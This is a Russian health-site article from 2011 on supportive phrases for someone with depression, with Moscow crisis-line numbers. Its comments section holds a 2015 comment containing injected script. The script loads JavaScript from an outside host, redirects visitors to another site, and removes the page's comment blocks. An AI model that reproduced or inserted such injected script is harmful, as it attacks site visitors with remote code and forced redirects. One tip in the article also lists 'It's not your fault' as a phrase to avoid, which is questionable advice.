Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что сказать человеку в де...  >>  Что сказать человеку в депрессии?
 
Обратная связь
 

Что сказать человеку в депрессии?

Размер шрифта
30 августа 2011 06:50
  • google_analytics: false
  • Нравится

Депрессия – это серьезное заболевание, которое может привести к гибели. Если кто-то из ваших близких переживает депрессию, важно найти правильные слова, которые облегчат его страдания и не навредят ему. Читайте 7 наших рекомендаций о том, какие слова помогают, а какие – нет.

депрессия

  1. Что такое депрессия?

Обычно депрессией называется любое подавленное состояние психики. Врачи различают несколько видов депрессии, в том числе малую и клиническую депрессию (большое депрессивное расстройство), которая считается болезнью. Большую роль играют близкие, если они рядом и готовы окружить больного любовью и заботой.

Слова поддержки:

Скажите: «Ты не один».

Избегайте фразы: «Кому-то еще хуже, чем тебе».
 

  1. Поддержите лечение

Если человек сломал руку, он отправляется к врачу, а не ждет, пока кости срастутся неправильно. То же с депрессией. Однако люди часто не воспринимают ее в качестве серьезной болезни. Попробуйте подсказать больному о необходимости визита к врачу. Объясните, что болезнь нельзя пускать на самотек.

Слова поддержки:

Скажите: «Я никогда не оставлю тебя».

Избегайте фразы: «Попробуй ромашковый чай – успокаивает».
 

  1. Больше терпения

Когда аргументы и теплые слова кончились, остается терпеть. Ни в коем случае не давайте выхода раздражению, если вы больше не можете терпеть вечно мрачного человека рядом с собой. Зарубите себе на носу: депрессия – это болезнь, а не то, что может просто действовать на нервы.

Слова поддержки:

Скажите: «Я не могу до конца понять того, что ты чувствуешь, но я очень тебе сочувствую».

Избегайте фразы: «Хватит себя жалеть».
 

  1. Держите руку на пульсе

Вы всегда должны быть доступны для разговора. Предложите больному найти медицинского специалиста и обсудите состоявшийся визит. Только если вы знаете, что творится в голове у больного, вы сможете предотвратить возможный суицид. Почувствовав, что «оно» приближается, наберите телефон «горячей линии» или обратитесь к сотрудникам «скорой», если жизнь больного в опасности.

Слова поддержки:

Повторяйте: «Давай я тебя обниму».

Избегайте: «Я знаю, что ты чувствуешь. Однажды я целый месяц не могла выкарабкаться из депрессии».

Спорт

 

  1. Займитесь спортом

Позвоните больному и пригласите его на семейный праздник. Люди в депрессии часто остаются в изоляции, потому что боятся «помешать» другим людям. Идеальным вариантом остаются спортивные игры или другие виды физических упражнений – они улучшают сон и позволяют быстро достичь желаемых результатов – забить гол, заработать очки, выиграть сет в теннис. Если больной не высказывает особого желания – не настаивайте.

Слова поддержки:

Повторяйте: «Ты очень важен для меня».

Избегайте: «А кто сказал, что жизнь справедлива?»
 

  1. Шаг за шагом

Человек в депрессии часто задается вопросом: «А зачем мне вообще что-то делать? Зачем вставать с постели?» Помогите ему найти ответ с помощью простой техники: каждое действие должно вознаграждаться. Зафиксируйте все достижения за день и взгляните на них вместе – это подарит больному чувство удовлетворения от проделанной работы.

Слова поддержки:

Повторяйте: «Ты справишься, и я буду с тобой до конца».

Избегайте: «Это не твоя вина».
 

  1. Обратитесь к специалистам

В России работают десятки «горячих линий» и телефонов доверия. Перед вами несколько московских номеров. Возможно, по одному из этих номеров вам скажут телефон «горячей линии» в вашем собственном городе.

  • «Горячая линия» центра психологической помощи МЧС России 926-3707. В будние дни, 09.00 – 18.00
  • Помощь женщинам в кризисе 282-8450. Кроме понедельника и пятницы, 10.00 – 20.00
  • Экстренная медико-психологическая помощь в кризисных ситуациях 205-0550
  • Экстренная психологическая помощь 575-8770
  • Психиатрическая помощь Москвы 699-61-28

Слова поддержки:

Повторяйте: «Надежда всегда есть».

Избегайте: «Прекрати кукситься».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все что надо знать о бронхите   Что с вами делает злость?   Болезни-близнецы. Депрессия и гипотиреоз   Как мы реагируем на стресс  
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 01 апреля 2013Сладкие газировки вызывают депрессию
 
22 ноября 2012Ботокс – спасение от депрессии 24 февраля 2012Мигрень повышает риск депрессии у женщин
 

Слайдшоу

1
Вся правда о депрессии
Как справится со стрессом без лекарств?
Есть ли у вас перепады настроения?

Тесты

Что вы знаете о депрессии?
Есть ли у вас анемия?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.